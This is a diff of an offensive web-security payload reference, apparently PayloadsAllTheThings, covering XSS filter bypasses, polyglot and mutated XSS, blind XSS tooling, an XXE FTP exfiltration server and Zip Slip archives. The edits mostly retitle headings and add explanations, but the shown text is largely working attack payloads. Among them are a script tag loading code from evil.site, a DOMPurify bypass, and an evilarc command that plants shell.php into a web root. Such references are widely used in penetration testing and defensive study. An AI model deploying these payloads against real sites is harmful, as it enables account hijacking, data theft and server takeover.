@ -339,9 +355,9 @@ XSSObject.proxy = function (obj, name, report_function_name, exec_original) {
 XSSObject.proxy(window, 'alert', 'window.alert', false);
 ```

-## Bypass ">" using nothing
+## Bypass ">" using Nothing

-You don't need to close your tags.
+There is no need to close the tags, the browser will try to fix it.

 ```javascript
 <svg onload=alert(1)//
@ -355,7 +371,7 @@ Use Unicode characters `U+FF1C` and `U+FF1E`, refer to [Bypass using Unicode](#b
 ＜script/src=//evil.site/poc.js＞
 ```

-## Bypass ";" using another character
+## Bypass ";" using Another Character

 ```javascript
 'te' * alert('*') * 'xt';
@ -376,7 +392,7 @@ Use Unicode characters `U+FF1C` and `U+FF1E`, refer to [Bypass using Unicode](#b
 ```


-## Bypass using missing charset header
+## Bypass using Missing Charset Header

 **Requirements**:

@ -409,7 +425,7 @@ Use `%1b(J` to force convert a `\'` (ascii) in to `¥'` (JIS X 0201 1976), unesc
 Payload: `search=%1b(J&lang=en";alert(1)//`


-## Bypass using HTML encoding
+## Bypass using HTML Encoding

 ```javascript
 %26%2397;lert(1)
@ -556,7 +572,7 @@ XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o
 ```


-## Bypass using jsfuck
+## Bypass using JSfuck

 Bypass using [jsfuck](http://www.jsfuck.com/)

--- a/Polyglot.md
+++ b/Polyglot.md
@ -1,5 +1,7 @@
 # Polyglot XSS

+A polyglot XSS is a type of cross-site scripting (XSS) payload designed to work across multiple contexts within a web application, such as HTML, JavaScript, and attributes. It exploits the application’s inability to properly sanitize input in different parsing scenarios.
+
 * Polyglot XSS - 0xsobky
    ```javascript
    jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
--- a/Injection/README.md
+++ b/Injection/README.md
@ -12,24 +12,23 @@
    - [UI Redressing](#ui-redressing)
    - [Javascript Keylogger](#javascript-keylogger)
    - [Other Ways](#other-ways)
- [Identify an XSS endpoint](#identify-an-xss-endpoint)
+- [Identify an XSS Endpoint](#identify-an-xss-endpoint)
    - [Tools](#tools)
 - [XSS in HTML/Applications](#xss-in-htmlapplications)
    - [Common Payloads](#common-payloads)
    - [XSS using HTML5 tags](#xss-using-html5-tags)
-    - [XSS using a remote JS](#xss-using-a-remote-js)
-    - [XSS in hidden input](#xss-in-hidden-input)
-    - [XSS when payload is reflected capitalized](#xss-when-payload-is-reflected-capitalized)
-    - [DOM based XSS](#dom-based-xss)
+    - [XSS using a Remote JS](#xss-using-a-remote-js)
+    - [XSS in Hidden Input](#xss-in-hidden-input)
+    - [XSS in Uppercase Output](#xss-in-uppercase-output)
+    - [DOM Based XSS](#dom-based-xss)
    - [XSS in JS Context](#xss-in-js-context)
 - [XSS in Wrappers for URI](#xss-in-wrappers-for-uri)
    - [Wrapper javascript:](#wrapper-javascript)
    - [Wrapper data:](#wrapper-data)
    - [Wrapper vbscript:](#wrapper-vbscript)
- [XSS in files](#xss-in-files)
+- [XSS in Files](#xss-in-files)
    - [XSS in XML](#xss-in-xml)
    - [XSS in SVG](#xss-in-svg)
-    - [XSS in SVG (short)](#xss-in-svg-short)
    - [XSS in Markdown](#xss-in-markdown)
    - [XSS in CSS](#xss-in-css)
 - [XSS in PostMessage](#xss-in-postmessage)
@ -128,7 +127,7 @@ More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all]
 - [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html)


-## Identify an XSS endpoint
+## Identify an XSS Endpoint

 This payload opens the debugger in the developer console rather than triggering a popup alert box.

@ -251,7 +250,7 @@ Most tools are also suitable for blind XSS attacks:
 e.g: 14.rs/#alert(document.domain)
 ```

-### XSS in hidden input
+### XSS in Hidden Input

 ```javascript
 <input type="hidden" accesskey="X" onclick="alert(1)">
@ -262,13 +261,13 @@ in newer browsers : firefox-130/chrome-108
 <input type="hidden" oncontentvisibilityautostatechange="alert(1)"  style="content-visibility:auto" >
 ```

-### XSS when payload is reflected capitalized
+### XSS in Uppercase Output

 ```javascript
 <IMG SRC=1 ONERROR=&#X61;&#X6C;&#X65;&#X72;&#X74;(1)>
 ```

-### DOM based XSS
+### DOM Based XSS

 Based on a DOM XSS sink.

@ -329,7 +328,7 @@ only IE
 vbscript:msgbox("XSS")
 ```

-## XSS in files
+## XSS in Files

 **NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.

@ -389,7 +388,7 @@ More comprehensive payload with svg tag attribute, desc script, foreignObject sc



-### XSS in SVG (short)
+#### Short SVG Payload

 ```javascript
 <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
@ -399,7 +398,7 @@ More comprehensive payload with svg tag attribute, desc script, foreignObject sc
 <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
 ```

-### XSS in SVG (nesting)
+### Nesting SVG and XSS

 Including a remote SVG image in a SVG works but won't trigger the XSS embedded in the remote SVG. Author: noraj.

@ -500,6 +499,7 @@ document.getElementById('btn').onclick = function(e){
 XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app). 

 You can set up an alternative version 
+
 * Self-hosted version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express)
 * Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/)

@ -511,9 +511,9 @@ You can set up an alternative version

 ### Other Blind XSS tools

- [sleepy-puppy - Netflix](https://github.com/Netflix-Skunkworks/sleepy-puppy)
- [bXSS - LewisArdern](https://github.com/LewisArdern/bXSS)
- [ezXSS - ssl](https://github.com/ssl/ezXSS)
+- [Netflix-Skunkworks/sleepy-puppy](https://github.com/Netflix-Skunkworks/sleepy-puppy) - Sleepy Puppy XSS Payload Management Framework
+- [LewisArdern/bXSS](https://github.com/LewisArdern/bXSS) - bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting. 
+- [ssl/ezXSS](https://github.com/ssl/ezXSS) - ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting. 

 ### Blind XSS endpoint

@ -540,20 +540,25 @@ Eg. payload

 Eg. one-line HTTP server:

-```
+```ps1
 $ ruby -run -ehttpd . -p8080
 ```

 ## Mutated XSS

-Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`.
+Use browsers quirks to recreate some HTML tags.

-Mutated XSS from Masato Kinugawa, used against DOMPurify component on Google Search. Technical blogposts available at https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/ and https://research.securitum.com/dompurify-bypass-using-mxss/.
+**Example**: Mutated XSS from Masato Kinugawa, used against [cure53/DOMPurify](https://github.com/cure53/DOMPurify) component on Google Search. 

 ```javascript
 <noscript><p title="</noscript><img src=x onerror=alert(1)>">
 ```

+Technical blogposts available at
+
+* https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/
+* https://research.securitum.com/dompurify-bypass-using-mxss/
+

 ## Labs

--- a/Injection/README.md
+++ b/Injection/README.md
@ -631,7 +631,7 @@ And using FTP instead of HTTP allows to retrieve much larger files.

 Serve DTD and receive FTP payload using [staaldraad/xxeserv](https://github.com/staaldraad/xxeserv):

-```
+```ps1
 $ xxeserv -o files.log -p 2121 -w -wd public -wp 8000
 ```

--- a/Slip/README.md
+++ b/Slip/README.md
@ -6,39 +6,45 @@

 * [Tools](#tools)
 * [Methodology](#methodology)
-    * [Detection](#detection)
-    * [Basic Exploit](#basic-exploit)
-* [Additional Notes](#additional-notes)
+    * [Additional Notes](#additional-notes)
+* [References](#references)
+

 ## Tools

 * [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc) - Create tar/zip archives that can exploit directory traversal vulnerabilities
 * [usdAG/slipit](https://github.com/usdAG/slipit) - Utility for creating ZipSlip archives

+
 ## Methodology

-### Detection
+The Zip Slip vulnerability is a critical security flaw that affects the handling of archive files, such as ZIP, TAR, or other compressed file formats. This vulnerability allows an attacker to write arbitrary files outside of the intended extraction directory, potentially overwriting critical system files, executing malicious code, or gaining unauthorized access to sensitive information.

-Any ZIP upload page on the application.
+**Example**: Suppose an attacker creates a ZIP file with the following structure:

-### Basic Exploit
-
-Using [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc):
-
-```python
-python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
+```
+malicious.zip
+  ├── ../../../../etc/passwd
+  ├── ../../../../usr/local/bin/malicious_script.sh
 ```

-Creating a ZIP archive containing a symbolic link:
+When a vulnerable application extracts `malicious.zip`, the files are written to `/etc/passwd` and /`usr/local/bin/malicious_script.sh` instead of being contained within the extraction directory. This can have severe consequences, such as corrupting system files or executing malicious scripts.

-```ps1
-ln -s ../../../index.php symindex.txt
-zip --symlinks test.zip symindex.txt
-```

-### Additional Notes
+* Using [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc):
+    ```python
+    python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
+    ```
+
+* Creating a ZIP archive containing a symbolic link:
+
+    ```ps1
+    ln -s ../../../index.php symindex.txt
+    zip --symlinks test.zip symindex.txt
+    ```
+
+For a list of affected libraries and projects, visit [snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)

-For affected libraries and projects, visit [snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)

 ## References